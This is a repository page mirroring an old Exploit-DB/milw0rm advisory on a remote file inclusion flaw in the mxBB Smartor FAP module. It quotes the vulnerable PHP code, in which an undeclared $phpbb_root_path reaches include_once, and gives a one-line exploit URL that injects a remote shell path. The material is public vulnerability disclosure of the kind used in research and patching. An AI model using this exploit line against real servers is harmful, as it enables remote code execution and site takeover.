bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/3766.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

42 lines
No EOL
1.3 KiB
Text
Raw Blame History

########################################################################
mxBB Module MX Smartor FAP 2.0 RC1 Remote File Inclusion Vulnerability
########################################################################
Class: Remote
Vendor: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=364
Founder: bd0rk
Contact: bd0rk[at]hackermail.com
Vulnerable Code in /admin/admin_album_otf.php
---------------------------------------------------------------------------------------------
define( 'IN_PORTAL', 1 );
if ( !empty( $setmodules ) )
{
$file = basename( __FILE__ );
$module['Smartor_Album']['Configuration otf'] = 'modules/mx_smartor/admin/' . $file;
return;
}
$mx_root_path = './../../../';
$module_root_path = "./../";
$phpEx = substr(strrchr(__FILE__, '.'), 1);
require( $mx_root_path . '/admin/pagestart.' . $phpEx );
include_once($phpbb_root_path . 'includes/functions_validate.'.$phpEx);
---------------------------------------------------------------------------------------------
$phpbb_root_path is not declared before include_once
[+]Exploit: http://[target]/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=Shell?
Shouts: str0ke, TheJT, Lu7k, GolD_M ;-)
# milw0rm.com [2007-04-19]
Reference in a new issue View git blame Copy permalink